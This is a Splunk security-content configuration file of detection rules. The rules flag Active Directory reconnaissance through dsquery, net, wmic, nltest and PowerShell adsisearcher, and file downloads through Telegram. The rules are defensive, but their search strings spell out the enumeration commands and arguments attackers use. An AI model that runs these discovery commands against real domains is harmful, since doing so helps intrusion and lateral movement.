action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover domain users. The `user` argument returns a list of all users registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery with Dsquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery with Dsquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="dsquery.exe" AND Processes.process = "*user*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_dsquery_filter` [ESCU - Domain Account Discovery With Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. 
Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery With Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Graceful Wipe Out Attack", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery With Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. 
action.notable.param.rule_title = Domain Account Discovery With Net App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process = "* user*" AND Processes.process = "*/do*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_net_app_filter` [ESCU - Domain Account Discovery with Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery with Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery with Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": 
["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Domain Account Discovery with Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="wmic.exe" AND Processes.process = "*/NAMESPACE:\\\\root\\directory\\ldap*" AND Processes.process = "*ds_user*" AND Processes.process = "*GET*" AND Processes.process = "*ds_samaccountname*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_wmic_filter` [ESCU - Domain Controller Discovery with Nltest - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and `/dsgetdc:` can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and `/dsgetdc:` can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Controller Discovery with Nltest - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Domain controller discovery on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Controller Discovery with Nltest - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and `/dsgetdc:` can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. 
action.notable.param.rule_title = Domain Controller Discovery with Nltest action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="nltest.exe") (Processes.process="*/dclist:*" OR Processes.process="*/dsgetdc:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_controller_discovery_with_nltest_filter` [ESCU - Domain Controller Discovery with Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command line return a list of all domain controllers in a Windows domain. Red Teams and adversaries alike use wmic.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command line return a list of all domain controllers in a Windows domain. Red Teams and adversaries alike use wmic.exe to identify remote systems for situational awareness and Active Directory Discovery. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Controller Discovery with Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Controller Discovery with Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible 
= false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process="" OR Processes.process="*DomainControllerAddress*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_controller_discovery_with_wmic_filter` [ESCU - Domain Group Discovery with Adsisearcher - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use Adsisearcher for troubleshooting. 
action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery with Adsisearcher - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery enumeration using PowerShell on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery with Adsisearcher - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. 
action.notable.param.rule_title = Domain Group Discovery with Adsisearcher action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (Message = "*[adsisearcher]*" AND Message = "*(objectcategory=group)*" AND Message = "*findAll()*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest |rename User as user | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter` [ESCU - Domain Group Discovery With Dsquery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to query for domain groups. The argument `group` returns a list of all domain groups. Red Teams and adversaries alike may leverage dsquery.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to query for domain groups. The argument `group` returns a list of all domain groups. Red Teams and adversaries alike may leverage dsquery.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Dsquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Dsquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe") (Processes.process="*group*") by 
Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_group_discovery_with_dsquery_filter` [ESCU - Domain Group Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` with command-line arguments utilized to query for domain groups. The argument `group /domain` returns a list of all domain groups. Red Teams and adversaries alike use net.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` with command-line arguments utilized to query for domain groups. The argument `group /domain` returns a list of all domain groups. Red Teams and adversaries alike use net.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Active Directory Discovery", "Prestige Ransomware", "Graceful Wipe Out Attack", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Active Directory Discovery", "Prestige Ransomware", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process=*group* AND Processes.process=*/do*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `domain_group_discovery_with_net_filter` [ESCU - Domain Group Discovery With Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain groups. The arguments utilized in this command return a list of all domain groups. Red Teams and adversaries alike use wmic.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain groups. The arguments utilized in this command return a list of all domain groups. Red Teams and adversaries alike use wmic.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_group* AND Processes.process="*GET ds_samaccountname*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_group_discovery_with_wmic_filter` [ESCU - Download Files Using Telegram - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic will identify a suspicious download by the Telegram application on a Windows 
system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port scanner, bruteforcer, masscan) to the system, which were later used to map the whole network and move further laterally. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port scanner, bruteforcer, masscan) to the system, which were later used to map the whole network and move further laterally. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and TargetFilename from your endpoints, or events that record file stream creation (Sysmon EventCode 15), which occurs when a process downloads a file. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Normal file downloads by the Telegram application 
(if it is a commonly used app on the network). action.escu.creation_date = 2021-05-06 action.escu.modification_date = 2021-05-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Download Files Using Telegram - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["XMRig", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = Suspicious files were downloaded with the Telegram application on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Download Files Using Telegram - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port scanner, bruteforcer, masscan) to the system, which were later used to map the whole network and move further laterally. 
